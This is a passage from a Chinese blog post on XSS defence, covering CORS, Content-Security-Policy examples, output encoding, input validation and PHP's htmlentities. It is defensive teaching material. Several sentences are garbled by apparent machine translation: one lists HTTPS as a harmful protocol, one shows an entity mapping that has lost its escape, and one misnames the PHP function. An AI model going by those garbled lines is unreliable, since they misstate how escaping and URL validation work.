<li>您可以跨域调用某些函数。例如，您可以在新窗口中调用 <code>getMessage() </code> 和<code>close</code> <code> getMessage()</code> 函数。该函数也可以在 iframe 和新窗口中调用，以便将消息从一个域发送到另一个域。 <code>blur</code> <code>focus</code> <code>postMessage</code></li>
</ul>
</li>
</ul>
<h4>CORS</h4>

<p><strong>跨源资源共享</strong>（<a target="_blank" rel="noopener" href="https://developer.mozilla.org/zh-CN/docs/Glossary/CORS">CORS</a>，或通俗地译为跨域资源共享）是一种基于 <a target="_blank" rel="noopener" href="https://developer.mozilla.org/zh-CN/docs/Glossary/HTTP">HTTP</a> 头的机制，该机制通过允许服务器标示除了它自己以外的其他<a target="_blank" rel="noopener" href="https://developer.mozilla.org/zh-CN/docs/Glossary/Origin">源</a>（域、协议或端口），使得浏览器允许这些源访问加载自己的资源。</p>
<p>跨源资源共享标准新增了一组 <a target="_blank" rel="noopener" href="https://developer.mozilla.org/zh-CN/docs/Web/HTTP/Reference/Headers">HTTP 标头</a>字段，允许服务器声明哪些源站通过浏览器有权限访问哪些资源。另外，规范要求，对那些可能对服务器数据产生副作用的 HTTP 请求方法（特别是 <a target="_blank" rel="noopener" href="https://developer.mozilla.org/zh-CN/docs/Web/HTTP/Reference/Methods/GET"><code>GET</code></a> 以外的 HTTP 请求，或者搭配某些 <a target="_blank" rel="noopener" href="https://developer.mozilla.org/zh-CN/docs/Web/HTTP/Guides/MIME_types">MIME 类型</a>的 <a target="_blank" rel="noopener" href="https://developer.mozilla.org/zh-CN/docs/Web/HTTP/Reference/Methods/POST"><code>POST</code></a> 请求），浏览器必须首先使用 <a target="_blank" rel="noopener" href="https://developer.mozilla.org/zh-CN/docs/Web/HTTP/Reference/Methods/OPTIONS"><code>OPTIONS</code></a> 方法发起一个预检请求（preflight request），从而获知服务端是否允许该跨源请求。服务器确认允许之后，才发起实际的 HTTP 请求。在预检请求的返回中，服务器端也可以通知客户端，是否需要携带身份凭证（例如 <a target="_blank" rel="noopener" href="https://developer.mozilla.org/zh-CN/docs/Web/HTTP/Guides/Cookies">Cookie</a> 和 <a target="_blank" rel="noopener" href="https://developer.mozilla.org/zh-CN/docs/Web/HTTP/Guides/Authentication">HTTP 认证</a>相关数据）。</p>
<h4>CSP(Content security policy)</h4>



<p>CSP 是一种浏览器安全机制，旨在缓解 XSS 和其他一些攻击。它的工作原理是限制页面可以加载的资源（例如脚本和图像），并限制页面是否可以被其他页面嵌入。</p>
<p>要启用 CSP，响应需要包含一个名为 <code>&lt;CSP_DIR&gt;</code> 的 HTTP 响应头，<code>Content-Security-Policy</code>其值包含策略信息。策略本身由一个或多个指令组成，指令之间用分号分隔。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">Content-Security-Policy:</span><br><span class="line">    default-src &#x27;self&#x27;;</span><br><span class="line">    //所有未单独指定的资源，都只能从当前同源加载</span><br><span class="line">    script-src &#x27;self&#x27;;</span><br><span class="line">    //只允许加载本站 JavaScript</span><br><span class="line">    style-src &#x27;self&#x27;;</span><br><span class="line">    //只允许本站 CSS 样式</span><br><span class="line">    img-src &#x27;self&#x27;;</span><br><span class="line">    object-src &#x27;none&#x27;;</span><br><span class="line">    frame-ancestors &#x27;none&#x27;;</span><br><span class="line">    //禁止页面被任何 iframe/frame 嵌套</span><br><span class="line">    base-uri &#x27;self&#x27;;</span><br><span class="line">    //控制 &lt;base href=&quot;...&quot;&gt; 的来源</span><br><span class="line">    connect-src &#x27;self&#x27;;</span><br><span class="line">    //限制 AJAX / fetch / WebSocket 只能访问同源</span><br><span class="line"></span><br></pre></td></tr></table></figure>







<p>了解了上面的基础知识就可以更好的了解我们下面要讲的防护了</p>
<p>跨站脚本攻击的防范通常可以通过两层防御来实现：</p>
<ul>
<li>对输出数据进行编码</li>
<li>到达时验证输入</li>
</ul>
<h4>对输出进行编码</h4>

<p>编码应该在将用户可控数据写入页面之前立即应用，因为写入的上下文决定了需要使用哪种编码。例如，JavaScript 字符串中的值需要与 HTML 上下文中的值不同的转义方式。</p>
<p>在 HTML 环境中，您应该将未列入白名单的值转换为 HTML 实体：</p>
<ul>
<li><code>&lt;</code>转换为：<code>&lt;</code></li>
<li><code>&gt;</code>转换为：<code>&gt;</code></li>
</ul>
<p>在 JavaScript 字符串上下文中，非字母数字值应该进行 Unicode 转义：</p>
<ul>
<li><code>&lt;</code>转换为：<code>\u003c</code></li>
<li><code>&gt;</code>转换为：<code>\u003e</code></li>
</ul>
<p>有时您需要按正确的顺序应用多层编码。例如，要安全地将用户输入嵌入到事件处理程序中，您需要同时处理 JavaScript 上下文和 HTML 上下文。因此，您需要先对输入进行 Unicode 转义，然后再进行 HTML 编码：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;a href=&quot;#&quot; onclick=&quot;x=&#x27;This string needs two layers of escaping&#x27;&quot;&gt;test&lt;/a&gt;</span><br></pre></td></tr></table></figure>





<h4>到达时验证</h4>

<p>编码可能是抵御 XSS 攻击最重要的防线，但它不足以在所有情况下都完全防止 XSS 漏洞。您还应该在首次收到用户输入时就尽可能严格地验证其有效性。</p>
<p>输入验证示例包括：</p>
<ul>
<li>如果用户提交的 URL 将在响应中返回，请验证其是否以安全的协议（例如 HTTP 和 HTTPS）开头。否则，有人可能会使用有害协议（例如 HTTPS 或<code>javascript</code>HTTPS）攻击您的网站<code>data</code>。</li>
<li>如果用户提供的值预期为数值，则验证该值是否实际包含整数。</li>
<li>验证输入是否仅包含预期的字符集。</li>
</ul>
<p>理想的输入验证方式应该是直接阻止无效输入。另一种尝试清除无效输入使其有效的方法更容易出错，应尽可能避免。</p>
<h4>CSP防xss</h4>

<p>内容安全策略 (CSP) 是抵御跨站脚本攻击的最后一道防线。如果您的 XSS 防护措施失效，您可以使用 CSP 通过限制攻击者的操作来缓解 XSS 攻击。</p>
<p>CSP 允许您控制各种事项，例如是否允许加载外部脚本以及是否执行内联脚本。要部署 CSP，您需要在 HTTP 响应头中添加一个名为 <code>&lt;header_name&gt;</code> 的参数，<code>Content-Security-Policy</code>其值包含您的策略。</p>
<p>以下是一个CSP示例：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">default-src &#x27;self&#x27;; script-src &#x27;self&#x27;; object-src &#x27;none&#x27;; frame-src &#x27;none&#x27;; base-uri &#x27;none&#x27;;</span><br></pre></td></tr></table></figure>

<p>此策略规定，图片和脚本等资源只能从与主页相同的源加载。因此，即使攻击者成功注入了 XSS 有效载荷，他们也只能从当前源加载资源。这大大降低了攻击者利用 XSS 漏洞的可能性。</p>
<p>如果您需要加载外部资源，请确保仅允许不会帮助攻击者利用您网站的脚本。例如，如果您将某些域名列入白名单，攻击者就可以加载来自这些域名的任何脚本。尽可能将资源托管在您自己的域名上。</p>
<h4>php中防xss</h4>

<p>PHP 中有一个名为 <code>encode</code> 的内置函数用于对实体进行编码<code>htmlentities</code>。在 HTML 上下文中，您应该调用此函数来转义输入。该函数应使用三个参数调用：</p>
<ul>
<li>您输入的字符串。</li>
<li><code>ENT_QUOTES</code>这是一个标志，用于指定所有引号都应该进行编码。</li>
<li>字符集在大多数情况下应为 UTF-8。</li>
</ul>
<p>例如：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php echo htmlentities($input, ENT_QUOTES, &#x27;UTF-8&#x27;);?&gt;</span><br></pre></td></tr></table></figure>
    </div>
  </article>
  <div class="ccbyncsa">
    <div class="container">
        <div class="row">
            <div class="col-md-12">
                <div class="copyright">
                    <div class="author">
                        <p>Author</p>
                        <p>yunli</p>
                    </div>
                    <div class="title">
                        <p>Title</p>
                        <p>一篇文章了解XSS</p>
                    </div>
                        <div class="publish">
                            <p>Published</p>
                            <p>2025-11-21</p>
                        </div>
                    <div class="ccbyncsa-icon">
                        <p>CC-BY-NC-SA 4.0</p>
                        <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">
                        <p class="ccbyncsa-icon-imgs" style="display: flex;">
                        <img src="/images/cc.svg" alt="cc">
                        <img src="/images/by.svg" alt="by">
                        <img src="/images/nc.svg" alt="nc">
                        <img src="/images/sa.svg" alt="sa">
                        </p>
                        </a>
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>
  <nav class="post-pagination">
    
    
  </nav>
  

</div>

<script src="/js/copy.js"></script>

<aside class="sidebar-container sidebar-right">
    <div class="sidebar-bg">
        <p id="date"></p>
<script>
  function updateDate() {
    var now = new Date();
    var dateString = now.toISOString().slice(0, 10);
    document.getElementById('date').textContent = dateString;
  }

  window.addEventListener('load', function() {
    updateDate();
    // 更新频率为每5分钟更新一次，减少不必要的更新
    setInterval(updateDate, 300000);
  });
</script>
        <span id="clock" role="timer" aria-live="polite"></span>


<script>
  document.addEventListener('DOMContentLoaded', function() {
    const clockElement = document.getElementById('clock');
    let timerInterval;

    // 格式化时间函数
    function formatTime(unit) {
      return unit < 10 ? '0' + unit : unit;
    }

    // 更新时钟 - 包含秒
    function updateClock() {
      const now = new Date();
      const hours = formatTime(now.getHours());
      const minutes = formatTime(now.getMinutes());
      const seconds = formatTime(now.getSeconds());
      clockElement.textContent = `${hours}:${minutes}:${seconds}`;
    }

    // 初始化时钟
    function startClock() {
      // 立即更新一次时间
      updateClock();
      // 每秒更新一次
      timerInterval = setInterval(updateClock, 1000);
    }

    // 页面可见性变化时的优化
    document.addEventListener('visibilitychange', function() {
      if (document.hidden) {
        // 页面不可见时停止更新
        clearInterval(timerInterval);
      } else {
        // 页面重新可见时，重新开始
        clearInterval(timerInterval);
        startClock();
      }
    });

    // 启动时钟
    startClock();
  });
</script>


    </div>
    <div class="sidebar-bg">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link"><span class="toc-number">1.</span> <span class="toc-text">原理</span></a></li><li class="toc-item toc-level-2"><a class="toc-link"><span class="toc-number">2.</span> <span class="toc-text">xss三种类型</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link"><span class="toc-number">2.1.</span> <span class="toc-text">反射型</span></a></li><li class="toc-item toc-level-4"><a class="toc-link"><span class="toc-number">2.2.</span> <span class="toc-text">存储型</span></a></li><li class="toc-item toc-level-4"><a class="toc-link"><span class="toc-number">2.3.</span> <span class="toc-text">dom型</span></a></li><li class="toc-item toc-level-4"><a class="toc-link"><span class="toc-number">2.4.</span> <span class="toc-text">三种类型区别</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link"><span class="toc-number">3.</span> <span class="toc-text">xss利用</span></a></li><li class="toc-item toc-level-2"><a class="toc-link"><span class="toc-number">4.</span> <span class="toc-text">xss防护</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link"><span class="toc-number">4.1.</span> <span class="toc-text">Httponly</span></a></li><li class="toc-item toc-level-4"><a class="toc-link"><span class="toc-number">4.2.</span> <span class="toc-text">SOP(Same-origin policy)</span></a></li><li class="toc-item toc-level-4"><a class="toc-link"><span class="toc-number">4.3.</span> <span class="toc-text">CORS</span></a></li><li class="toc-item toc-level-4"><a class="toc-link"><span class="toc-number">4.4.</span> <span class="toc-text">CSP(Content security policy)</span></a></li><li class="toc-item toc-level-4"><a class="toc-link"><span class="toc-number">4.5.</span> <span class="toc-text">对输出进行编码</span></a></li><li class="toc-item toc-level-4"><a class="toc-link"><span class="toc-number">4.6.</span> <span class="toc-text">到达时验证</span></a></li><li class="toc-item toc-level-4"><a class="toc-link"><span class="toc-number">4.7.</span> <span class="toc-text">CSP防xss</span></a></li><li class="toc-item toc-level-4"><a class="toc-link"><span class="toc-number">4.8.</span> <span class="toc-text">php中防xss</span></a></li></ol></li></ol>
    </div>
    <div class="sidebar-bg">
        <div class="card-tags">
            
                <a href="/tags/xss/" class="tag" aria-label="标签: #xss">#xss</a>
            
        </div>
    </div>
    <div>
        <div class="categories-list">
            
                <div class="category-item">
                    <a href="/categories/%E6%8A%80%E6%9C%AF%E5%88%86%E4%BA%AB/" aria-label="分类: 技术分享">
                        技术分享
                        <span>(1)</span>
                    </a>
                </div>
            
        </div>
    </div>
</aside>

    <!-- No categories available -->


    <footer>
    <span id="busuanzi_container_site_pv" style="display: inline;"></span>
    <span>👁<span id="busuanzi_value_site_pv"></span></span>
    <div class="padding border border-sub border-dotted fadein-right">
        <span style="color:aliceblue">👤<span id="busuanzi_value_site_uv"></span></span>
    </div>
    <span>
        Powered by <a target="_blank" rel="noopener" href="https://hexo.io" alt="Hexo">
            <p class="hover-underline night" style="display: inline;">Hexo</p>
        </a>
        <p style="display: inline; color: red;">❤</p>
        Built with <a target="_blank" rel="noopener" href="https://github.com/xingwangzhe/hexo-theme-wang" alt="Wang">
            <p class="hover-underline night" style="display: inline;">Wang</p>
        </a> Theme
    </span>

    <!-- 带图片的链接 -->
    <div class="footer-links">
        
    </div>

    <!-- 纯文本链接 -->
    <div class="footer-text-links">
        
            
                <a href="" target="_blank" rel="noopener">
                    我与我周旋久
                </a>
            
        
    </div>
</footer>
    
<script src="/js/background.js"></script>
    
        
<script src="/js/search.js"></script>
    
</main>
</body>
</html>
